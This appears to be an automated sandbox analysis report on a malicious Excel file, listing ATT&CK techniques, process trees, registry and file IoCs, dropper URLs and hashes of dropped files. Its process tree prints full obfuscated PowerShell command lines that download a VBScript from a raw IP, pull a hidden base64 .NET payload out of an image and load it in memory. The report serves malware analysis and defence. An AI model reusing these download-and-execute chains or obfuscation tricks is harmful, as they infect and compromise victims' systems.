18675f25203e08b39f835cec09a3697c6b1998dadcf22ba528828184f9f4515a

Analysis

max time kernel
120s
max time network
121s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
21-11-2024 03:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

18675f25203e08b39f835cec09a3697c6b1998dadcf22ba528828184f9f4515a.xls
Size

1.1MB
MD5

73346e64a29d684532eca0a6a17e8f4c
SHA1

61980a1ee86bfe46bccfc5d2262c635dc06bf6b6
SHA256

18675f25203e08b39f835cec09a3697c6b1998dadcf22ba528828184f9f4515a
SHA512

9e821cbde002e872c03ef05adfe720efebb729a655747bde5d8e81e2949bc199b3c3774d476610d24a5b37b4c69c0cad521561904030e6657bf1aed27d007dda
SSDEEP

24576:Auq9PLiijE2Z5Z2am4ZFb9+k5HbW3kZiyihBMpOLpEI:AuEPLiij7Z5ZKA9l5HbWUsK0

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

exe.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

Signatures

Blocklisted process makes network request 5 IoCs

Processes:

mshta.exePOWeRSHElL.EXepowershell.exe

flow pid process

12 2752 mshta.exe
13 2752 mshta.exe
15 2616 POWeRSHElL.EXe
17 320 powershell.exe
18 320 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

2292 powershell.exe
320 powershell.exe
Evasion via Device Credential Deployment 2 IoCs
defense_evasion execution

Processes:

POWeRSHElL.EXepowershell.exe

pid process

2616 POWeRSHElL.EXe
840 powershell.exe

flow	pid	process
12	2752	mshta.exe
13	2752	mshta.exe
15	2616	POWeRSHElL.EXe
17	320	powershell.exe
18	320	powershell.exe

pid	process
2292	powershell.exe
320	powershell.exe

pid	process
2616	POWeRSHElL.EXe
840	powershell.exe

Drops file in System32 directory 4 IoCs

Processes:

POWeRSHElL.EXepowershell.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	POWeRSHElL.EXe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

EXCEL.EXEmshta.exePOWeRSHElL.EXepowershell.execsc.exeWScript.exepowershell.execvtres.exepowershell.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	POWeRSHElL.EXe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry
T1012

System Information Discovery
T1082

Processes:

EXCEL.EXE

description ioc process

Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE
Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main mshta.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

2508 EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

POWeRSHElL.EXepowershell.exepowershell.exepowershell.exe

pid process

2616 POWeRSHElL.EXe
840 powershell.exe
2292 powershell.exe
320 powershell.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

pid	process
2508	EXCEL.EXE

pid	process
2616	POWeRSHElL.EXe
840	powershell.exe
2292	powershell.exe
320	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

POWeRSHElL.EXepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2616	POWeRSHElL.EXe
Token: SeDebugPrivilege	840	powershell.exe
Token: SeDebugPrivilege	2292	powershell.exe
Token: SeDebugPrivilege	320	powershell.exe

Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

EXCEL.EXE

pid process

2508 EXCEL.EXE
2508 EXCEL.EXE
2508 EXCEL.EXE
2508 EXCEL.EXE
2508 EXCEL.EXE

pid	process
2508	EXCEL.EXE
2508	EXCEL.EXE
2508	EXCEL.EXE
2508	EXCEL.EXE
2508	EXCEL.EXE

Suspicious use of WriteProcessMemory 28 IoCs

Processes:

mshta.exePOWeRSHElL.EXecsc.exeWScript.exepowershell.exe

description	pid	process	target process
PID 2752 wrote to memory of 2616	2752	mshta.exe	POWeRSHElL.EXe
PID 2752 wrote to memory of 2616	2752	mshta.exe	POWeRSHElL.EXe
PID 2752 wrote to memory of 2616	2752	mshta.exe	POWeRSHElL.EXe
PID 2752 wrote to memory of 2616	2752	mshta.exe	POWeRSHElL.EXe
PID 2616 wrote to memory of 840	2616	POWeRSHElL.EXe	powershell.exe
PID 2616 wrote to memory of 840	2616	POWeRSHElL.EXe	powershell.exe
PID 2616 wrote to memory of 840	2616	POWeRSHElL.EXe	powershell.exe
PID 2616 wrote to memory of 840	2616	POWeRSHElL.EXe	powershell.exe
PID 2616 wrote to memory of 2816	2616	POWeRSHElL.EXe	csc.exe
PID 2616 wrote to memory of 2816	2616	POWeRSHElL.EXe	csc.exe
PID 2616 wrote to memory of 2816	2616	POWeRSHElL.EXe	csc.exe
PID 2616 wrote to memory of 2816	2616	POWeRSHElL.EXe	csc.exe
PID 2816 wrote to memory of 2776	2816	csc.exe	cvtres.exe
PID 2816 wrote to memory of 2776	2816	csc.exe	cvtres.exe
PID 2816 wrote to memory of 2776	2816	csc.exe	cvtres.exe
PID 2816 wrote to memory of 2776	2816	csc.exe	cvtres.exe
PID 2616 wrote to memory of 1432	2616	POWeRSHElL.EXe	WScript.exe
PID 2616 wrote to memory of 1432	2616	POWeRSHElL.EXe	WScript.exe
PID 2616 wrote to memory of 1432	2616	POWeRSHElL.EXe	WScript.exe
PID 2616 wrote to memory of 1432	2616	POWeRSHElL.EXe	WScript.exe
PID 1432 wrote to memory of 2292	1432	WScript.exe	powershell.exe
PID 1432 wrote to memory of 2292	1432	WScript.exe	powershell.exe
PID 1432 wrote to memory of 2292	1432	WScript.exe	powershell.exe
PID 1432 wrote to memory of 2292	1432	WScript.exe	powershell.exe
PID 2292 wrote to memory of 320	2292	powershell.exe	powershell.exe
PID 2292 wrote to memory of 320	2292	powershell.exe	powershell.exe
PID 2292 wrote to memory of 320	2292	powershell.exe	powershell.exe
PID 2292 wrote to memory of 320	2292	powershell.exe	powershell.exe

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\18675f25203e08b39f835cec09a3697c6b1998dadcf22ba528828184f9f4515a.xls
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2508

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2752
- C:\Windows\SysWOW64\WInDowspoWeRShelL\V1.0\POWeRSHElL.EXe
  "C:\Windows\sYSteM32\WInDowspoWeRShelL\V1.0\POWeRSHElL.EXe" "PoWERsHelL.Exe -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe ; INVoKe-ExPReSSIOn($(InVOkE-exPReSSIon('[sYStEM.Text.ENcODInG]'+[CHAR]58+[CHar]58+'utf8.GETstRIng([sYstEM.CONVeRt]'+[ChAR]58+[chaR]58+'FROMBAsE64sTRING('+[CHaR]34+'JGsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQmVyREVGaW5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkQ2JwY2N4dVFRbSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJek1tLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFppdmRUcFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZVeUZIc2dOZSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrVU96SGNmbHp5KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGZCIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIU2Jmb1ZwbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkazo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyLjEzL3hhbXBwL3NlL3NlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2l0aGdyZWF0dGhpbmdzd2l0aGxvdmVya2lzcy50SUYiLCIkRW5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIiwwLDApO1NUYVJ0LXNsZUVwKDMpO2lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIg=='+[cHaR]0x22+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2616
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe
    3⤵
    - Evasion via Device Credential Deployment
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:840
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zmqop2yy.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2816
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9F4C.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC9F4B.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2776
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestthingsentiretimewithgreatthingswithloverkis.vbS"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1432
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdEcDNpbWFnZVVybCA9IEYxbWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MicrJ0FhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgRjFtO0RwM3dlJysnYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7RHAzaW1hZ2VCeXRlcyA9IERwM3dlYkNsaWVudCcrJy5Eb3cnKydubG9hZERhdGEoRHAzaW1hZycrJ2VVcicrJ2wpO0RwM2ltYWdlVGV4JysndCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKERwM2ltYWdlQnl0ZXMpO0RwM3N0YXJ0RmxhZyA9IEYxbTwnKyc8QkFTRTY0X1NUQVJUPj5GMW0nKyc7RHAzZW5kRmxhZyA9IEYxbTw8QkFTRTY0X0VORD4+RjFtO0RwM3N0YXJ0SScrJ25kZXggPSBEcDNpbWFnZVRleHQuSW5kZXhPZihEcDNzdGFydEZsYWcpO0RwM2VuZEluZGUnKyd4ID0gRHAzaW1hZ2VUZXh0LkluZGV4T2YoRHAzZW4nKydkJysnRmxhZyk7RHAzc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIERwM2VuZEluZGV4IC1nJysndCBEcDNzdGFydEluZGV4O0RwM3N0YXJ0SW5kZXggKz0gRHAzc3RhcnQnKydGJysnbGFnLkxlbmd0aDtEcDNiYXNlNjRMZW5ndGggPSBEcDNlbmRJbmRleCAtIERwM3N0YXJ0SW5kZXg7RHAzYmFzJysnZTY0Q29tbWFuZCA9IERwM2ltYWdlVGV4dC5TdWJzdHJpbmcoRHAzc3RhcnRJbmRleCwgRHAzYmFzZTY0TGVuZ3RoKTtEcDNiYXNlNjRSZXZlcicrJ3NlZCA9IC1qb2luIChEcDNiYXNlNjRDb21tYW5kLlRvQ2gnKydhckFyJysncmF5KCkgNTl0IEZvckVhY2gtT2JqZWN0IHsgRHAzXyB9KVstMS4uLScrJyhEcDNiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldO0RwM2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbicrJ2coJysnRHAzYicrJ2FzZTY0UmV2ZXJzZWQpO0RwM2xvYWQnKydlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZScrJ2N0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChEcDNjb21tYW5kQnl0ZXMpO0RwM3ZhaU1ldGhvZCcrJyA9JysnIFtkJysnbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoRjFtVkFJRjFtKTtEcDN2YWlNZXRob2QuSW52bycrJ2tlKERwM251bGwsIEAoRjFtdHh0LkZSRkZSVy8yNTMvMzEuMjIuMy4yOTEvLzpwdHRoRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGJysnMW1kZXNhdGl2YWRvRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGMW1BZGRJblAnKydyb2Nlc3MzJysnMkYxbSwgRjFtZGVzYXRpdmFkb0YxbSwgRjFtZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLEYxbWRlc2F0aXZhZG9GMScrJ20sRjFtJysnZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLCcrJ0YxbWRlc2F0aXZhZG9GMW0sRjFtMUYxbSxGMW1kZXNhdGl2YWRvRjFtKSk7JykuUkVwbGFjZSgoW2NoYVJdNzArW2NoYVJdNDkrW2NoYVJdMTA5KSxbc1RSSU5nXVtjaGFSXTM5KS5SRXBsYWNlKChbY2hhUl02OCtbY2hhUl0xMTIrW2NoYVJdNTEpLCckJykuUkVwbGFjZSgoW2NoYVJdNTMrW2NoYVJdNTcrW2NoYVJdMTE2KSxbc1RSSU5nXVtjaGFSXTEyNCl8IC4oKEdldC1WQVJJYWJMRSAnKm1kcionKS5OYW1lWzMsMTEsMl0tSm9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2292
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Dp3imageUrl = F1mhttps://1017.filemail.com/api/file/get?filekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f F1m;Dp3we'+'bClient = New-Object System.Net.WebClient;Dp3imageBytes = Dp3webClient'+'.Dow'+'nloadData(Dp3imag'+'eUr'+'l);Dp3imageTex'+'t = [System.Text.Encoding]::UTF8.GetString(Dp3imageBytes);Dp3startFlag = F1m<'+'<BASE64_START>>F1m'+';Dp3endFlag = F1m<<BASE64_END>>F1m;Dp3startI'+'ndex = Dp3imageText.IndexOf(Dp3startFlag);Dp3endInde'+'x = Dp3imageText.IndexOf(Dp3en'+'d'+'Flag);Dp3startIndex -'+'ge 0 -and Dp3endIndex -g'+'t Dp3startIndex;Dp3startIndex += Dp3start'+'F'+'lag.Length;Dp3base64Length = Dp3endIndex - Dp3startIndex;Dp3bas'+'e64Command = Dp3imageText.Substring(Dp3startIndex, Dp3base64Length);Dp3base64Rever'+'sed = -join (Dp3base64Command.ToCh'+'arAr'+'ray() 59t ForEach-Object { Dp3_ })[-1..-'+'(Dp3base64Comma'+'nd.Length)];Dp3commandBytes = [System.Convert]::FromBase64Strin'+'g('+'Dp3b'+'ase64Reversed);Dp3load'+'edAssembly = [System.Refle'+'ction.Assembly]'+'::Load(Dp3commandBytes);Dp3vaiMethod'+' ='+' [d'+'nlib.IO.Home].GetMethod(F1mVAIF1m);Dp3vaiMethod.Invo'+'ke(Dp3null, @(F1mtxt.FRFFRW/253/31.22.3.291//:ptthF1m, F1mdesativadoF1m, F'+'1mdesativadoF1m, F1mdesativadoF1m, F1mAddInP'+'rocess3'+'2F1m, F1mdesativadoF1m, F1mdesativadoF1m,F1mdesativadoF1m,F1mdesativadoF1'+'m,F1m'+'desativadoF1m,F1mdesativadoF1m,'+'F1mdesativadoF1m,F1m1F1m,F1mdesativadoF1m));').REplace(([chaR]70+[chaR]49+[chaR]109),[sTRINg][chaR]39).REplace(([chaR]68+[chaR]112+[chaR]51),'$').REplace(([chaR]53+[chaR]57+[chaR]116),[sTRINg][chaR]124)| .((Get-VARIabLE '*mdr*').Name[3,11,2]-JoiN'')"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:320

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

Filesize
717B

MD5
822467b728b7a66b081c91795373789a

SHA1
d8f2f02e1eef62485a9feffd59ce837511749865

SHA256
af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9

SHA512
bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1087EC93233409051A3831D3D6C361C8

Filesize
504B

MD5
0b60282e9ddea43ca313d63ec56740ad

SHA1
e7cc9ff054f23bdd36103a4e90cc9f7e8e8b214a

SHA256
358893a6900a0c0cc4d1457dbe7bcdef7e24b7c437d3623806f23827caac2c13

SHA512
ed83aaf8dd61a513ec6854b3ba948fcfd8d4ffcbefebe082330d320f0c234003ba0b290eada14f79836cffd792931eb19bd3539ab2801c9c00c244e228439024

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

Filesize
192B

MD5
74231dbe304122ad45cb38a43c2b842b

SHA1
19bd5c727fc2dc21c3918473d624dea9bbda4eb4

SHA256
7bda9ea83af77c08e5e49808a8d99a0c8e3aeba86c5044d15db518bdd792b63c

SHA512
3406adef7d1e4fd5fa38006ecbfbdec0c52a008416aacb6a310c5f2480755ef0d578dfc0809d16a02cac29d9a913360f399f0083f1a34786ac14c63cf206baca

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1087EC93233409051A3831D3D6C361C8

Filesize
550B

MD5
48772ec0c9f1b6d9d7c151bc49a3e2ac

SHA1
5b1ca5f1c2a59e05934d1458cab204faac7e36c8

SHA256
7d6e51c4a43d1fc6f2eaaf96a7545d3bf8101751ba19576b5a800adf6dcad021

SHA512
c3ce5f027de97c3be23ebe8ec42582e15d0ea455fd67c6422901d770c03157c6d7dd36340a52da32aaf2f46f6285d46a1c495fcadaa847f44319167cb73c7f46

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AS91FDNI\seethebestthingswithgreatsituationshandletotheprogress[1].hta

Filesize
8KB

MD5
eda9bc2cfecb52b876ac6b28736ae91c

SHA1
d816efb133619fa4d928f28789e5a4fd86547f6d

SHA256
7cba9be9aae16c9e7487d00952039ce33b66ccbe4e87cc58f3529b9095a89619

SHA512
cb0e328f71cb29dd77d2a127ad8943f973b6424b6de756e7cb2c55eabd03f43a4952726467324dee22c6028ccbb51515d2cc46943b42c16f03aa42ca330ccdc1

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab95D9.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES9F4C.tmp

Filesize
1KB

MD5
3bdb62f1c16b3cf133a50cc24920e556

SHA1
d8ab44a76c35247d36b7d20fb6426d643490da21

SHA256
97cee760deaba0ad799aa26ad5435164842c81aaf8169333ec06fc2ad449c3a9

SHA512
0e9c086d7f0d7215feb5dbdc4330f3850a8e41ceeedb8a22c6d9563f800043967450029f09e92d1363cb091c59af47b718a2a67810fab03ab196e1ae1ec0d2ae

Download Submit
C:\Users\Admin\AppData\Local\Temp\zmqop2yy.dll

Filesize
3KB

MD5
287452c1ddc681747b74f20c6523ec16

SHA1
8b8479d715c6acdbf979816bfeb42c68eddc2919

SHA256
29a688355a78c74ac9aa0cf92daa484b800771b3c79dd4256ee542629f24fd14

SHA512
6645c13dcf3220a019463a5adf73d38160143cf412126e62e5d3ed6162f02aa4ddd8ec32e2a01b7c71cd67a4e60b214ad0adc1f3dc634947fadb9e21123e637f

Download Submit
C:\Users\Admin\AppData\Local\Temp\zmqop2yy.pdb

Filesize
7KB

MD5
a9ce7c5eaa15b06751ae08de7d6d1a2b

SHA1
2fdf71a81d6a2728abc8fa2ca16587fe6bdb269c

SHA256
46859f4f164f65a42a0ddfc50d43060b80a94d327e677c79e47018dc2d84dedc

SHA512
6565af0a8e10eca8be3aa385e6e6a38b1725bc33cec5b30c1d8393ff43c4d97a8f2f70f241da350794d6044876798b13b87db9d5d735a29a1770a6e40fa99074

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
b09f73d7bb61cd37cd4aeaa7c531bc37

SHA1
ff440d970e0577a041418662ff51127211844387

SHA256
72e3f734cc26aaeec8c0f86cb4d22af35461f2629ac9aefd3dcb4f964a6451d1

SHA512
a4dd6e4216556cf55c492b81a4514ecc6280c63a2011f43d8d4e85dc6d1ccd8c3bd0ecd95caef5257aa55bed2de56246b74f89411ecc17d0b931d4b827f86615

Download Submit
C:\Users\Admin\AppData\Roaming\seethebestthingsentiretimewithgreatthingswithloverkis.vbS

Filesize
138KB

MD5
2a43f3918d91622e9ccac7889f3e6dc2

SHA1
7d6131261e7f6a54291bd9e02eb7c985e093cfa7

SHA256
95f59c4235c1d4516b7d5de5a768f0f00c4a64c73a5be26fb26496ac5f378e9b

SHA512
422b39acb1dcacc05938ee122fa614a9a429e28a6a7f7ecf8a7f8416823b0e7ada11c28b7fe52ae1352d85fc99423ffdb16fd85ec2ac27f25a2f3adfed7b638c

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC9F4B.tmp

Filesize
652B

MD5
46611eacbbee71ee49ba5c7cd59cbb88

SHA1
4e0b6a16148e65c43e5f16a07260585175b823e7

SHA256
36ae7b7fe7b743bdf851e6c42757a015108ad28edd11c936a011233b1cf85878

SHA512
33cf6865a20a150c7c9c48e5004bed0032a1104aff2403d6be7619a3e45ec2c7fae859521e397a9afc5ca8b2624017c72c41e3c34e90f93126555c1e394fb873

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zmqop2yy.0.cs

Filesize
485B

MD5
d24098e842acdc16d68eb9fc1eb0d97d

SHA1
a5ed59b81d7a78e4f619850c0d05f05984c282a7

SHA256
5a2115bb93abacd6e4cf9c0fc15f629c527fc13513305ffae22ba8872db0e309

SHA512
9a387056470cd7b1cadc638ca29227303a6c447eb551d219fbf0fb0e4c4265d9b9d40e3830088bb8eae3626ceb827de0ccb827c68b5d6a878ac1d1d17056d9ae

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zmqop2yy.cmdline

Filesize
309B

MD5
57598e30440f9d8fae867d545989d835

SHA1
8359c15bfa53f5a7e50731b26bb7ec87797a8091

SHA256
975669f8fe500b3dc03e0ead81766d8b5c3e4053f4484d9479166a9cb6baa0e8

SHA512
2812645c199d737fbbe873c37e54089ea7babd66589fb746034810809368f24a312512eeab7cde1b5774ccf81f3b0ea1d0ecb6a933fb41d7cab8595c3bb5f1ec

Download Submit
